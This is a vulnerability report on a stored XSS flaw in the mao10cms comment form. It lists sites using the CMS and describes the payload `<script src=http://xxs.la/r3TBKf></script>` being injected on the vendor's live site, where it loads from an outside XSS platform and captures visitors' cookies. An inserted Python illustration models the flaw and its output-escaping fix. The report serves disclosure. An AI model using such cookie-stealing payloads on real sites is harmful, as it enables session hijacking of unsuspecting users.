### Summary:
mao10cms has a stored XSS (cookies were successfully captured)
### Details:
I'll first list some websites that use this system.
[<img src="https://images.seebug.org/upload/201504/27195641f4a0bcd68018f38daf05aca339950941.png" alt="t012e4d7cdf92f694dd.png" width="600">](https://images.seebug.org/upload/201504/27195641f4a0bcd68018f38daf05aca339950941.png)
[<img src="https://images.seebug.org/upload/201504/27195813eff560135804d1081ed30701b4ec279a.png" alt="t0155ddb" width="600">](https://images.seebug.org/upload/201504/27195813eff560135804d1081ed30701b4ec279a.png)
[<img src="https://images.seebug.org/upload/201504/272000110f8043381286e98d6be2145f9bc96aec.png" alt="t01eb78d4aabd822b6a.png" width="600">](https://images.seebug.org/upload/201504/272000110f8043381286e98d6be2145f9bc96aec.png)
[<img src="https://images.seebug.org/upload/201504/27195838cfdeea11ee29587c0dfddf83a7be9dd1.png" alt="t01927b3a24d237dd4e.png" width="600">](https://images.seebug.org/upload/201504/27195838cfdeea11ee29587c0dfddf83a7be9dd1.png)
[<img src="https://images.seebug.org/upload/201504/271958574eba1d69e0f5076371625a08f7e44871.png" alt="t01f7091f8726eb1295.png" width="600">](https://images.seebug.org/upload/201504/271958574eba1d69e0f5076371625a08f7e44871.png)
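That should be enough.
Official site: http://www.mao10.com
First we go to this link: http://www.mao10.com/post-group-single-id-283.html
There is a comment submission form below; we fill every field with the code that reports to our XSS platform.
My code is `<script src=http://xxs.la/r3TBKf></script>`
The title accepts it directly, but the content is filtered.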
[<img src="https://images.seebug.org/upload/201504/272002218f4c6eb07f2b290b596187b7ac39c925.png" alt="t01eb78d4aabd822b6a.png" width="600">](https://images.seebug.org/upload/201504/272002218f4c6eb07f2b290b596187b7ac39c925.png)
[<img src="https://images.seebug.org/upload/201504/272002394b499d94c4793027e7306d579e6954bd.png" alt="t0183d8497a0fdd221c.png" width="600">](https://images.seebug.org/upload/201504/272002394b499d94c4793027e7306d579e6954bd.png)
[<img src="https://images.seebug.org/upload/201504/27200252fd7cacb8e1b5a31169f5bd3da00fec3c.png" alt="t0183d8497a0fdd221c(1).png" width="600">](https://images.seebug.org/upload/201504/27200252fd7cacb8e1b5a31169f5bd3da00fec3c.png)
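Then submit.
A prompt asks you to enter a title and content; ignore it and wait for the page to redirect.
At this point you can see that the cookie has been captured successfully.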
[<img src="https://images.seebug.org/upload/201504/27200335d20b873004cef9a8a6190b89f4ab2857.png" alt="t0151daaf3e65960435.png" width="600">](https://images.seebug.org/upload/201504/27200335d20b873004cef9a8a6190b89f4ab2857.png)
If the code here is replaced with `<script>alert(/Z4lx/)</script>`, the effect is the same: a dialog box pops up.
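A defender-side model of the flaw described above and its fix, added here as an illustration and not taken from mao10cms: one field is filtered on input while the other is written to the page as submitted. The function names, the `<h4>`/`<p>` markup, the tag-stripping filter and the `session` cookie name are assumptions made for the example.

```python
import html
import re
from http.cookies import SimpleCookie

# The two payloads quoted in the report, used here only as test input.
PAYLOADS = [
    "<script src=http://xxs.la/r3TBKf></script>",
    "<script>alert(/Z4lx/)</script>",
]

def strip_tags(text):
    """Assumed stand-in for the content filter: drop anything tag-shaped."""
    return re.sub(r"<[^>]*>", "", text)

def render_vulnerable(title, content):
    # Flaw modelled from the report: only the content field is filtered,
    # the title is written into the page exactly as submitted.
    return "<h4>%s</h4><p>%s</p>" % (title, strip_tags(content))

def render_hardened(title, content):
    # Fix: HTML-encode every user-controlled field at output time,
    # so no field depends on an input filter having run.
    return "<h4>%s</h4><p>%s</p>" % (html.escape(title), html.escape(content))

def has_script_tag(markup):
    return re.search(r"<\s*script", markup, re.IGNORECASE) is not None

def session_cookie(value):
    # Defence in depth: HttpOnly keeps the session cookie out of reach of
    # document.cookie even if a script does get injected.
    cookie = SimpleCookie()
    cookie["session"] = value
    cookie["session"]["httponly"] = True
    cookie["session"]["secure"] = True
    cookie["session"]["path"] = "/"
    return cookie["session"].OutputString()

if __name__ == "__main__":
    for p in PAYLOADS:
        print("vulnerable:", has_script_tag(render_vulnerable(p, p)))
        print("hardened:  ", has_script_tag(render_hardened(p, p)))
    print(session_cookie("constructed-session-id"))
```

Encoding at output covers the title, the content and any field added later, which a per-field input filter does not.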
### Proof of vulnerability:
[<img src="https://images.seebug.org/upload/201504/2720043830072b4d7343a0ebdcbbe6b8194fb201.png" alt="t0151daaf3e65960435.png" width="600">](https://images.seebug.org/upload/201504/2720043830072b4d7343a0ebdcbbe6b8194fb201.png)